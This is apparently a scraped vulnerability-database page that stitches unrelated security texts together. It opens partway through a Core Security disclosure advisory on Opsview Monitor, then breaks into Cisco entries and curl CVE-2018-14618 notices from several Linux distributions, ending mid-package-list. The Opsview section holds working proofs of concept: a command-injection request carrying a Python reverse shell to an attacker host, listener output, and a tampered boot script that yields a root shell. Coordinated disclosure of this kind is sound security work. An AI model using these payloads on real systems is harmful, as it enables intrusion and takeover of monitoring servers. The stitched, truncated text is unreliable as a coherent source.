1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1
-----/
Once clicked, the authenticated administrator will be redirected to the
vulnerable section where his browser will perform a request to the
'/settings' endpoint in order to obtain a valid 'restToken'. Finally,
using that token, the API request to
'rest/config/notificationmethod/testnotification' will be exploited thus
resulting in a reverse shell.
7.4. **Rancid test connection functionality abuse leading to command
execution**
[CVE-2018-16144] NetAudit is a section within Network Analyzer that
allows the user to automate the backing up of network devices'
configuration files to a centralized location.
The following proof of concept executes a reverse shell:
/-----
POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: admin
x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 434
Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;
auth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D
Connection: close
ip=<attackerIP>++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'`&host_id=2
-----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,
sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
$ uname -a
Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34
UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
-----/
7.5. **Script modification could allow local privilege escalation**
[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios
privileges and the scripts that run at boot time, impersonate nagios
user during its execution. However, the
'/etc/init.d/opsview-reporting-module' script invokes the
'/opt/opsview/jasper/bin/db_jasper' script before dropping root
privileges.
The following excerpt shows the vulnerable code:
/-----
/etc/init.d/opsview-reporting-module:
/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null
if [ $? != 0 ]; then
echo "Attempted to start jasperserver but MySQL credentials are wrong."
exit 0
fi
DAEMON=/opt/opsview/jasper/bin/rc.jasperserver
test -x $DAEMON || exit 0
# Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null
if [ $? = 0 ] ; then
su - opsview -c "$DAEMON $@"
else
exec $DAEMON $@
fi
-----/
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the
vulnerable script, can be edited by the nagios user which belongs to the
'opsview' group.
/-----
ls -ltr /opt/opsview/jasper/bin/db_jasper
-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017
/opt/opsview/jasper/bin/db_jasper
nagios@image-builder-299:/home/admin$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Since 'db_jasper' receives 'db_exists' as an argument, which is later
used in a case statement, an attacker could edit that specific part of
the script in order to execute arbitrary code once the appliance is
rebooted.
The following excerpt shows the attacker's bash script which, after
execution, will trigger a reverse shell with root privileges:
/-----
while [ "x$1" != "x" ] ; do
case "$1" in
db_export)
db_export
;;
db_export_test)
db_export_test
;;
db_export_initial)
TEST=1
db_backup
;;
db_import)
db_import
;;
db_install)
db_install
;;
db_backup)
db_backup
;;
db_restore)
db_restore
;;
db_exists)
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerIP>",16000));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' &
db_exists
exit $?
;;
db_upgrade)
db_upgrade
exit $?
;;
*)
die "Usage: $0
{db_export|db_import|db_install|db_backup|db_restore}"
;;
esac
shift
done
-----/
/-----
$nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,
sport 45566)
# id
uid=0(root) gid=0(root) groups=0(root)
-----/
8. **Report Timeline**
2018-05-03: Core Security sent an initial notification to Opsview,
asking for GPG keys in order to send draft advisory.
2018-05-04: Opsview replied attaching its GPG keys.
2018-05-04: Core Security sent the encrypted draft advisory.
2018-05-04: Opsview confirmed the reception of the advisory and informed
an initial response would be ready by May 11th.
2018-05-11: Opsview replied saying they were able to reproduce all of
the reported vulnerabilities and confirmed that they were present in all
supported versions of Opsview Monitor (5.4, 5.3 and 5.2).
In addition, Opsview informed that were planning to release a fix for
these versions by the end of July.
2018-05-11: Core Security thanked the confirmation.
2018-06-25: Opsview informed that they were planning to release a major
update for the product (6.0) at the end of July. This update will
address all reported vulnerabilities. Also, they informed that the
previous versions of the product would be fixed by the end of August.
2018-06-27: Core Security thanked the status update and asked for a
tentative public disclosure date.
2018-07-16: Core Security requested a status update.
2018-07-18: Opsview proposed to set a tentative publication date by the
end of August when they release the fixes for its earlier versions.
2018-07-18: Core Security agreed with the Opsview's proposal.
2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0
release will be available on July 25th. In addition, they
informed that they didn't have the exact release date for the updates to
previous versions of the product.
2018-08-06: Core Security requested a status update for the remaining
fixes.
2018-08-13: Opsview replied saying that they were targeting the week of
August 24th for release the fixes of their earlier product versions and
they would confirm the exact date at the end of the next week.
2018-08-13: Core Security thanked the reply.
2018-08-24: Opsview informed Core Security that the remaining fixed
versions will be available on August 29th.
2018-08-24: Core Security thanked the update and proposed September 4th
as the coordinated release date.
2018-08-28: Opsview agreed on the proposed release date.
2018-09-04: Advisory CORE-2018-0008 published.
9. **References**
[1] https://www.opsview.com/solutions
10. **About CoreLabs**
CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at: http://corelabs.coresecurity.com.
11. **About Core Security**
Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The
company's threat-aware, identity & access, network security, and
vulnerability management solutions provide actionable insight and
context needed to manage security risks across the enterprise. This
shared insight gives customers a comprehensive view of their security
posture to make better security remediation decisions. Better insight
allows organizations to prioritize their efforts to protect critical
assets, take action sooner to mitigate access risk, and react faster if
a breach does occur.
Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or info@coresecurity.com
12. **Disclaimer**
The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
| VAR-201810-0322 | CVE-2018-0447 | Cisco Email Security Appliance AsyncOS Software Access Control Error Vulnerability |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
A vulnerability in the anti-spam protection mechanisms of Cisco AsyncOS Software for the Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to bypass certain content filters on an affected device. The vulnerability is due to incomplete input and validation checking mechanisms for certain Sender Policy Framework (SPF) messages that are sent to an affected device. An attacker could exploit this vulnerability by sending a customized SPF packet to an affected device. If successful, an exploit could allow the attacker to bypass the URL filters that are configured for the affected device, which could allow malicious URLs to pass through the device. The device provides spam protection, email encryption, and data loss prevention. AsyncOSSoftware is a set of operating systems used in it.
An attacker can exploit this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks.
This issue is being tracked by Cisco Bug ID CSCvj55728
| VAR-201810-0300 | CVE-2018-0422 | Windows for Cisco Webex Meetings Vulnerabilities related to authorization, permissions, and access control |
CVSS V2: 6.9 CVSS V3: 7.3 Severity: HIGH |
A vulnerability in the folder permissions of Cisco Webex Meetings client for Windows could allow an authenticated, local attacker to modify locally stored files and execute code on a targeted device with the privilege level of the user. The vulnerability is due to folder permissions that grant a user the permission to read, write, and execute files in the Webex folders. An attacker could exploit this vulnerability to write malicious files to the Webex client directory, affecting all other users of the targeted device. A successful exploit could allow a user to execute commands with elevated privileges. Attacks on single-user systems are less likely to occur, as the attack must be carried out by the user on the user's own system. Multiuser systems have a higher risk of exploitation because folder permissions have an impact on all users of the device. For an attacker to exploit this vulnerability successfully, a second user must execute the locally installed malicious file to allow remote code execution to occur. Windows for Cisco Webex Meetings Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows local attackers to escalate privileges on vulnerable installations of Cisco WebEx Network Recording Player. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists in the access control that the product installer sets on the product's binaries. This allows any local user to replace the product's binaries with malicious replacements. An attacker can leverage this vulnerability to escalate privileges to the level of some other user of the system, such as an administrator. Cisco Webex Meetings Client is prone to a local privilege-escalation vulnerability.
This issue is being tracked by Cisco bug IDs CSCvh89155, CSCvh89157 and CSCvh89158. Cisco Webex Meetings Suite and others are multi-functional video conferencing solutions of Cisco (Cisco). Webex Meetings client for Windows is a Windows-based video conferencing client software. The following products are affected: Cisco Webex Meetings Suite (WBS31); Cisco Webex Meetings Suite (WBS32); Cisco Webex Meetings Suite (WBS33); Cisco Webex Meetings; Cisco Webex Meetings Server
| VAR-201809-0686 | CVE-2018-14618 | curl Integer overflow vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
curl before version 7.61.1 is vulnerable to a buffer overrun in the NTLM authentication code. The internal function Curl_ntlm_core_mk_nt_hash multiplies the length of the password by two (SUM) to figure out how large temporary storage area to allocate from the heap. The length value is then subsequently used to iterate over the password and generate output into the allocated storage buffer. On systems with a 32 bit size_t, the math to calculate SUM triggers an integer overflow when the password length exceeds 2GB (2^31 bytes). This integer overflow usually causes a very small buffer to actually get allocated instead of the intended very huge one, making the use of that buffer end up in a heap buffer overflow. (This bug is almost identical to CVE-2017-8816.). curl Contains an integer overflow vulnerability. This vulnerability CVE-2017-8816 It is a similar problem.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. cURL/libcURL is prone to a heap-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions.
cURL/libcURL version 7.15.4 through 7.61.0 are vulnerable. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201903-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: cURL: Multiple vulnerabilities
Date: March 10, 2019
Bugs: #665292, #670026, #677346
ID: 201903-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in cURL, the worst of which
could result in a Denial of Service condition.
Background
==========
A command line tool and library for transferring data with URLs.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/curl < 7.64.0 >= 7.64.0
Description
===========
Multiple vulnerabilities have been discovered in cURL. Please review
the CVE identifiers referenced below for details.
Impact
======
Remote attackers could cause a Denial of Service condition.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All cURL users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/curl-7.64.0"
References
==========
[ 1 ] CVE-2018-14618
https://nvd.nist.gov/vuln/detail/CVE-2018-14618
[ 2 ] CVE-2018-16839
https://nvd.nist.gov/vuln/detail/CVE-2018-16839
[ 3 ] CVE-2018-16840
https://nvd.nist.gov/vuln/detail/CVE-2018-16840
[ 4 ] CVE-2018-16842
https://nvd.nist.gov/vuln/detail/CVE-2018-16842
[ 5 ] CVE-2019-3822
https://nvd.nist.gov/vuln/detail/CVE-2019-3822
[ 6 ] CVE-2019-3823
https://nvd.nist.gov/vuln/detail/CVE-2019-3823
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201903-03
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2019 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
. ==========================================================================
Ubuntu Security Notice USN-3765-2
September 17, 2018
curl vulnerability
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 ESM
Summary:
curl could be made to run arbitrary code if it received a specially
crafted input. This update provides
the corresponding update for Ubuntu 12.04 ESM.
Original advisory details:
It was discovered that curl incorrectly handled certain inputs.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 ESM:
curl 7.22.0-3ubuntu4.23
libcurl3 7.22.0-3ubuntu4.23
libcurl3-gnutls 7.22.0-3ubuntu4.23
libcurl3-nss 7.22.0-3ubuntu4.23
In general, a standard system update will make all the necessary
changes. 7) - aarch64, ppc64le, s390x
3. Description:
The curl packages provide the libcurl library and the curl utility for
downloading files from servers using various protocols, including HTTP,
FTP, and LDAP.
Security Fix(es):
* curl: NTLM password overflow via integer overflow (CVE-2018-14618)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Bug Fix(es):
* baseurl with file:// hangs and then timeout in yum repo (BZ#1709474)
* curl crashes on http links with rate-limit (BZ#1711914)
4.
See https://curl.haxx.se/docs/CVE-2018-14618.html for more information.
For the stable distribution (stretch), this problem has been fixed in
version 7.52.1-5+deb9u7.
We recommend that you upgrade your curl packages.
For the detailed security status of curl please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/curl
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEBsId305pBx+F583DbwzL4CFiRygFAluQNvMACgkQbwzL4CFi
RygTog//QTj+fBPm49RW3szmgcyGwkh/kccOPSlTeuafg7mAX9pJRIqIE3AE1dNN
UJMYe09qYpN/mR2kewpeu8LOYBoJnjhBcrCtXv1Tz2RgLTbROqfAiOPGLkSSFM8O
Loor2LDpbcLIMPqYiYHmcEsTE+BJVmZ0rsyG77GaMoDP0juFfj1LM17JnQLSITVB
yggSYdfNkmJI91g08KdVEHkvxxHw1qR98zF8Ft0Z+vg6is11As1LF8O0UH9XYQym
7PWhRdO3hwYcsFqc+c/HEdM9cPxKMFHX1KCfGcW4VElmL2GSyBTWUvkoH9s2NvZF
IiRR5xJz8Z8Exdj/mWHGCn10ZT2QWvYljZpqCdXw4c5mxTnmCBIGJswq8Ds23iG+
xsI8l4RJfpIpku7gERgJX0jKmFWh4rmIdRwK50C39MCC1NgKDbH8NglKF6LzNBnz
QK7jDg/cKjZ0N2nMKXQUWPrzyE6WrbdwJy5V1yAPT7wGBlvC3NPOBxBkARxlEAv9
Qw0eZiPBSUNc+FGBEsTEH2PWcGwBN7FXHgzJ2JpUpIRB6pxYnI16gwJEgz2VLKLb
xJ//HtoJsm0wAiDtq9AvEkQANVDHb/p9+BYrJw+NMRTuUaJKVBKeuowFEm4aAJP5
Z84D9LjdILwEXoBkxgMwrzNuyuaryFq10XaazC/uUitn5guRtrY=mPG5
-----END PGP SIGNATURE-----
.
Here are the details from the Slackware 14.2 ChangeLog:
+--------------------------+
patches/packages/curl-7.61.1-i586-1_slack14.2.txz: Upgraded.
For more information, see:
https://curl.haxx.se/docs/CVE-2018-14618.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14618
(* Security fix *)
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/curl-7.61.1-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/curl-7.61.1-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/curl-7.61.1-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/curl-7.61.1-x86_64-1_slack14.1.txz
Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/curl-7.61.1-i586-1_slack14.2.txz
Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/curl-7.61.1-x86_64-1_slack14.2.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/curl-7.61.1-i586-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/curl-7.61.1-x86_64-1.txz
MD5 signatures:
+-------------+
Slackware 14.0 package:
d6493074efefb47021747a0f525a3875 curl-7.61.1-i486-1_slack14.0.txz
Slackware x86_64 14.0 package:
9d5fb07395d570c7af54d306dff25e0d curl-7.61.1-x86_64-1_slack14.0.txz
Slackware 14.1 package:
fff7b1f0df80b7b8386e6b1b58fadaec curl-7.61.1-i486-1_slack14.1.txz
Slackware x86_64 14.1 package:
fe69bb3baaf679dec8bd3abea3c6ef02 curl-7.61.1-x86_64-1_slack14.1.txz
Slackware 14.2 package:
e130826573cd1cf9b5d769690ff91811 curl-7.61.1-i586-1_slack14.2.txz
Slackware x86_64 14.2 package:
161e1f2949b0285484de8aa16953c5e7 curl-7.61.1-x86_64-1_slack14.2.txz
Slackware -current package:
7135b216f6e989b0ae3e6123f6a07083 n/curl-7.61.1-i586-1.txz
Slackware x86_64 -current package:
b96ce6cdc7ae46e5979563f8f939fcfd n/curl-7.61.1-x86_64-1.txz
Installation instructions:
+------------------------+
Upgrade the package as root:
# upgradepkg curl-7.61.1-i586-1_slack14.2.txz
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: httpd24 security, bug fix, and enhancement update
Advisory ID: RHSA-2018:3558-01
Product: Red Hat Software Collections
Advisory URL: https://access.redhat.com/errata/RHSA-2018:3558
Issue date: 2018-11-13
CVE Names: CVE-2016-5419 CVE-2016-5420 CVE-2016-5421
CVE-2016-7141 CVE-2016-7167 CVE-2016-8615
CVE-2016-8616 CVE-2016-8617 CVE-2016-8618
CVE-2016-8619 CVE-2016-8620 CVE-2016-8621
CVE-2016-8622 CVE-2016-8623 CVE-2016-8624
CVE-2016-8625 CVE-2016-9586 CVE-2017-7407
CVE-2017-8816 CVE-2017-8817 CVE-2017-15710
CVE-2017-15715 CVE-2017-1000100 CVE-2017-1000101
CVE-2017-1000254 CVE-2017-1000257 CVE-2018-1283
CVE-2018-1301 CVE-2018-1303 CVE-2018-1312
CVE-2018-1333 CVE-2018-11763 CVE-2018-14618
CVE-2018-1000007 CVE-2018-1000120 CVE-2018-1000121
CVE-2018-1000122 CVE-2018-1000301
=====================================================================
1. Summary:
An update for httpd24-httpd, httpd24-nghttp2, and httpd24-curl is now
available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - aarch64, noarch, ppc64le, s390x, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.4) - noarch, ppc64le, s390x, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5) - noarch, ppc64le, s390x, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6) - noarch, ppc64le, s390x, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
3. Description:
The Apache HTTP Server is a powerful, efficient, and extensible web server.
The httpd24 packages provide a recent stable release of version 2.4 of the
Apache HTTP Server, along with the mod_auth_kerb module.
The following packages have been upgraded to a later upstream version:
httpd24-httpd (2.4.34), httpd24-curl (7.61.1). (BZ#1590833, BZ#1648928)
Security Fix(es):
* httpd: Improper handling of headers in mod_session can allow a remote
user to modify session data for CGI applications (CVE-2018-1283)
* httpd: Out of bounds read in mod_cache_socache can allow a remote
attacker to cause DoS (CVE-2018-1303)
* httpd: mod_http2: Too much time allocated to workers, possibly leading to
DoS (CVE-2018-1333)
* httpd: DoS for HTTP/2 connections by continuous SETTINGS frames
(CVE-2018-11763)
* httpd: Out of bounds write in mod_authnz_ldap when using too small
Accept-Language values (CVE-2017-15710)
* httpd: <FilesMatch> bypass with a trailing newline in the file name
(CVE-2017-15715)
* httpd: Out of bounds access after failure in reading the HTTP request
(CVE-2018-1301)
* httpd: Weak Digest auth nonce generation in mod_auth_digest
(CVE-2018-1312)
* curl: Multiple security issues were fixed in httpd24-curl (CVE-2016-5419,
CVE-2016-5420, CVE-2016-5421, CVE-2016-7141, CVE-2016-7167, CVE-2016-8615,
CVE-2016-8616, CVE-2016-8617, CVE-2016-8618, CVE-2016-8619, CVE-2016-8620,
CVE-2016-8621, CVE-2016-8622, CVE-2016-8623, CVE-2016-8624, CVE-2016-8625,
CVE-2016-9586, CVE-2017-1000100, CVE-2017-1000101, CVE-2017-1000254,
CVE-2017-1000257, CVE-2017-7407, CVE-2017-8816, CVE-2017-8817,
CVE-2018-1000007, CVE-2018-1000120, CVE-2018-1000121, CVE-2018-1000122,
CVE-2018-1000301, CVE-2018-14618)
For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.
Red Hat would like to thank the Curl project for reporting CVE-2017-8816,
CVE-2017-8817, CVE-2017-1000254, CVE-2017-1000257, CVE-2018-1000007,
CVE-2018-1000120, CVE-2018-1000122, CVE-2018-1000301, CVE-2016-9586,
CVE-2017-1000100, CVE-2017-1000101, CVE-2018-14618, and CVE-2018-1000121.
Upstream acknowledges Alex Nichols as the original reporter of
CVE-2017-8816; the OSS-Fuzz project as the original reporter of
CVE-2017-8817 and CVE-2018-1000301; Max Dymond as the original reporter of
CVE-2017-1000254 and CVE-2018-1000122; Brian Carpenter and the OSS-Fuzz
project as the original reporters of CVE-2017-1000257; Craig de Stigter as
the original reporter of CVE-2018-1000007; Duy Phan Thanh as the original
reporter of CVE-2018-1000120; Even Rouault as the original reporter of
CVE-2017-1000100; Brian Carpenter as the original reporter of
CVE-2017-1000101; Zhaoyang Wu as the original reporter of CVE-2018-14618;
and Dario Weisser as the original reporter of CVE-2018-1000121.
Bug Fix(es):
* Previously, the Apache HTTP Server from the httpd24 Software Collection
was unable to handle situations when static content was repeatedly
requested in a browser by refreshing the page. As a consequence, HTTP/2
connections timed out and httpd became unresponsive. This bug has been
fixed, and HTTP/2 connections now work as expected in the described
scenario. (BZ#1518737)
Enhancement(s):
* This update adds the mod_md module to the httpd24 Software Collection.
This module enables managing domains across virtual hosts and certificate
provisioning using the Automatic Certificate Management Environment (ACME)
protocol. The mod_md module is available only for Red Hat Enterprise Linux
7. (BZ#1640722)
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Software Collections 3.2 Release Notes linked from the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
After installing the updated packages, the httpd daemon will be restarted
automatically.
5. Bugs fixed (https://bugzilla.redhat.com/):
1362183 - CVE-2016-5419 curl: TLS session resumption client cert bypass
1362190 - CVE-2016-5420 curl: Re-using connection with wrong client cert
1362199 - CVE-2016-5421 curl: Use of connection struct after free
1373229 - CVE-2016-7141 curl: Incorrect reuse of client certificates
1375906 - CVE-2016-7167 curl: escape and unescape integer overflows
1388370 - CVE-2016-8615 curl: Cookie injection for other servers
1388371 - CVE-2016-8616 curl: Case insensitive password comparison
1388377 - CVE-2016-8617 curl: Out-of-bounds write via unchecked multiplication
1388378 - CVE-2016-8618 curl: Double-free in curl_maprintf
1388379 - CVE-2016-8619 curl: Double-free in krb5 code
1388382 - CVE-2016-8620 curl: Glob parser write/read out of bounds
1388385 - CVE-2016-8621 curl: curl_getdate out-of-bounds read
1388386 - CVE-2016-8622 curl: URL unescape heap overflow via integer truncation
1388388 - CVE-2016-8623 curl: Use-after-free via shared cookies
1388390 - CVE-2016-8624 curl: Invalid URL parsing with '#'
1388392 - CVE-2016-8625 curl: IDNA 2003 makes curl use wrong host
1406712 - CVE-2016-9586 curl: printf floating point buffer overflow
1439190 - CVE-2017-7407 curl: --write-out out of bounds read
1478309 - CVE-2017-1000101 curl: URL globbing out of bounds read
1478310 - CVE-2017-1000100 curl: TFTP sends more than buffer size
1495541 - CVE-2017-1000254 curl: FTP PWD response parser out of bounds read
1503705 - CVE-2017-1000257 curl: IMAP FETCH response out of bounds read
1515757 - CVE-2017-8816 curl: NTLM buffer overflow via integer overflow
1515760 - CVE-2017-8817 curl: FTP wildcard out of bounds read
1518737 - HTTP/2 connections hang and timeout
1537125 - CVE-2018-1000007 curl: HTTP authentication leak in redirects
1540167 - provides without httpd24 pre/in-fix
1552628 - CVE-2018-1000120 curl: FTP path trickery leads to NIL byte out of bounds write
1552631 - CVE-2018-1000121 curl: LDAP NULL pointer dereference
1553398 - CVE-2018-1000122 curl: RTSP RTP buffer over-read
1558450 - Not able to use SSLOpenSSLConfCmd with httpd24-httpd-2.4.27.
1560395 - CVE-2018-1283 httpd: Improper handling of headers in mod_session can allow a remote user to modify session data for CGI applications
1560399 - CVE-2018-1303 httpd: Out of bounds read in mod_cache_socache can allow a remote attacker to cause DoS
1560599 - CVE-2017-15710 httpd: Out of bounds write in mod_authnz_ldap when using too small Accept-Language values
1560614 - CVE-2017-15715 httpd: <FilesMatch> bypass with a trailing newline in the file name
1560634 - CVE-2018-1312 httpd: Weak Digest auth nonce generation in mod_auth_digest
1560643 - CVE-2018-1301 httpd: Out of bounds access after failure in reading the HTTP request
1575536 - CVE-2018-1000301 curl: Out-of-bounds heap read when missing RTSP headers allows information leak of denial of service
1605048 - CVE-2018-1333 httpd: mod_http2: Too much time allocated to workers, possibly leading to DoS
1622707 - CVE-2018-14618 curl: NTLM password overflow via integer overflow
1628389 - Make OCSP more configurable (like CRL)
1633260 - mod_session missing apr-util-openssl
1633399 - CVE-2018-11763 httpd: DoS for HTTP/2 connections by continuous SETTINGS frames
1634830 - FTBFS: httpd24-httpd
1640722 - mod_md is missing in httpd24-httpd
1646937 - Unable to start httpd
1648928 - Rebase curl to the latest version
6. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source:
httpd24-curl-7.61.1-1.el6.src.rpm
httpd24-httpd-2.4.34-7.el6.src.rpm
httpd24-nghttp2-1.7.1-7.el6.src.rpm
noarch:
httpd24-httpd-manual-2.4.34-7.el6.noarch.rpm
x86_64:
